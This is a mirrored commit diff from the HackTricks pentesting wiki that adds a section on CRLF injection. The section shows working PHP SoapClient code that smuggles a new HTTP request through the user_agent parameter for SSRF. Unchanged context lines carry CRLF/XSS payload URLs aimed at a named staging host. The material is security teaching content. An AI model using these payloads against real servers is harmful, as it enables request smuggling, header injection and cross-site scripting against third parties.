mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-22 04:33:28 +00:00
GitBook: [master] 447 pages modified
This commit is contained in:
parent
9ba43c8f19
commit
6672d2f49a
1 changed files with 31 additions and 1 deletions
|
@ -102,7 +102,37 @@ http://stagecafrstore.starbucks.com/%3f%0d%0aLocation:%0d%0aContent-Type:text/ht
|
|||
http://stagecafrstore.starbucks.com/%3f%0D%0ALocation://x:1%0D%0AContent-Type:text/html%0D%0AX-XSS-Protection%3a0%0D%0A%0D%0A%3Cscript%3Ealert(document.domain)%3C/script%3E
|
||||
```
|
||||
|
||||
[https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/crlf.md](https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/crlf.md)
|
||||
{% embed url="https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/crlf.md" %}
|
||||
|
||||
### New HTTP request in SSRF
|
||||
|
||||
Abusing CRLF injection you can **craft a new HTTP request and inject it**.
|
||||
A good example can be done using the `SoapClient` deserialization gadget from in PHP. This class is **vulnerable to CRLF** inside the `user_agent` parameter allowing to i**nsert new headers and body content**. However, you can even be able to abuse this vulnerability to **inject a new HTTP request:**
|
||||
|
||||
```php
|
||||
$target = 'http://127.0.0.1:9090/test';
|
||||
$post_string = 'variable=post value';
|
||||
$crlf = array(
|
||||
'POST /proxy HTTP/1.1',
|
||||
'Host: local.host.htb',
|
||||
'Cookie: PHPSESSID=[PHPSESSID]',
|
||||
'Content-Type: application/x-www-form-urlencoded',
|
||||
'Content-Length: '.(string)strlen($post_string),
|
||||
"\r\n",
|
||||
$post_string
|
||||
);
|
||||
|
||||
$client = new SoapClient(null,
|
||||
array(
|
||||
'uri'=>$target,
|
||||
'location'=>$target,
|
||||
'user_agent'=>"IGN\r\n\r\n".join("\r\n",$crlf)
|
||||
)
|
||||
);
|
||||
|
||||
#Put a nc listening in port 9090
|
||||
$client->__soapCall("test", []);
|
||||
```
|
||||
|
||||
### HTTP Header Injection
|
||||
|
||||
|
|
Loading…
Reference in a new issue